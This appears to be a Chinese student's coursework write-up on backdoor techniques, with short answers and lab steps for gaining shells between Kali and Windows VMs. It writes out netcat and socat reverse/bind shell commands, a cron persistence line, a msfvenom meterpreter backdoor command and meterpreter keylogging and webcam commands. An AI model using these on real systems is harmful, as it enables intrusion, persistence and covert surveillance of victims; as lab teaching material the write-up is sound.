20145307陈俊达《网络对抗》Exp2 后门原理与实践

基础问题回答

例举你能想到的一个后门进入到你系统中的可能方式?

非正规网站下载的软件 脚本 或者游戏中附加的第三方插件

例举你知道的后门如何启动起来(win及linux)的方式?

自启动型木马,windows计划任务

Meterpreter有哪些给你映像深刻的功能?

自动制作后门这点很厉害,黑客只需要输入命令即可,键盘录入器这是最致命的,你所有的密码都会被发现并记录

如何发现自己有系统有没有被安装后门?

及时安装可靠的防火墙

常用后门工具实践

Windows获得Linux Shell

在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5307端口:

在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5307端口:

Linux获得Windows Shell

过程与之前的类似,使用nc指令监听5307端口:

实验内容

使用netcat获取主机操作Shell,cron启动

先在Windows系统下,监听5307端口

用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:

在最后一行添加30 * * * * /bin/netcat 192.168.79.130 5307 -e /bin/sh,意思是在每个小时的第30分钟反向连接Windows主机的5307端口

使用socat获取主机操作Shell, 任务计划启动

基础知识

socat是ncat的增强版,它使用的格式是socat [options]

,其中两个address是必选项,而options 是可选项。

实践过程

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5307 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5307,同时把cmd.exe的stderr重定向到stdout上:

创建完成之后,注销用户,并再次登录

此时,在Kali环境下输入指令socat - tcp:192.168.79.130:5307,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5307端口,此时可以发现已经成功获得了一个cmd shell:

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.79.128 LPORT=5307 -f exe > 20145307_backdoor.exe生成后门程序,通过nc指令将生成的后门程序传送到Windows主机上

在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:

设置完成后,执行监听:

打开Windows上的后门程序此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权,使用record_mic指令可以截获一段音频,使用webcam_snap指令可以使用摄像头进行拍照,使用webcam stream指令可以使用摄像头进行录像,使用screenshot指令可以进行截屏,使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

对对对,但是我用的win7虚拟机,没摄像头驱动,没麦克风驱动,但是屏幕截图还是可以做的吗!截个图表示我这个鬼东西做出来了 是能用的

20145307陈俊达《网络对抗》Exp2 后门原理与实践的更多相关文章

  1. 20155331 丹增旦达 网络攻防 Exp2后门原理与实践

    20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  2. 20155323刘威良 网络对抗 Exp2 后门原理与实践

    20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...

  3. 20155302 Exp2 后门原理与实践

    20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...

  4. 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践

    2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...

  5. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  6. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  7. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  8. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  9. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

随机推荐

  1. mysql concat

    CONCAT_WS() 代表 CONCAT With Separator ,是CONCAT()的特殊形式. 第一个参数是其它参数的分隔符.分隔符的位置放在要连接的两个字符串之间. 分隔符可以是一个字符 ...

  2. 非旋转Treap

    Treap是一种平衡二叉树,同时也是一个堆.它既具有二叉查找树的性质,也具有堆的性质.在对数据的查找.插入.删除.求第k大等操作上具有期望O(log2n)的复杂度.     Treap可以通过节点的旋 ...

  3. 银联支付-产品测试sdk使用流程

    准备工作: 到https://open.unionpay.com/ajweb/help/file/techFile?productId=66下载开发文档和sdk 下载之后进行解压将Java Versi ...

  4. Android 跨进程调用忽略权限

    Framework层: @Override    public StackInfo getStackInfo(int stackId) {        final int callingUid = ...

  5. windows服务的默认启动类型和登录帐户

    转自:http://www.winhelponline.com/blog/windows-7-services-default-startup-type/ Service Name Startup T ...

  6. Yii2中省市三级联动(栏目联动)

    先从表的设计开始: 表的结构: CREATE TABLE `global_region` ( `region_id` smallint(5) unsigned NOT NULL AUTO_INCREM ...

  7. 传智播客京东商城移动web开发

    1.源码笔记 我的源码+笔记(很重要):链接: https://pan.baidu.com/s/1eScieps 密码: 3vyr 感谢传智播客项目相关视频:1.6天链接: https://pan.b ...

  8. HOJ 2139 Spiderman's workout(动态规划)

    Spiderman's workout My Tags (Edit) Source : Nordic Collegiate Programming Contest 2003 Time limit : ...

  9. AngularJs:Directive指令用法

    摘自:http://www.jb51.net/article/83051.htm 摘要:Directive(指令)是AngularJ非常强大而有有用的功能之一.它就相当于为我们写了公共的自定义DOM元 ...

  10. Database Sharding, The “Shared-Nothing” Approach DATABASE SHARDING

    w将单个服务器上的单个数据库打碎为多个服务器上的单个数据库 http://www.agildata.com/database-sharding/ Database Sharding provides ...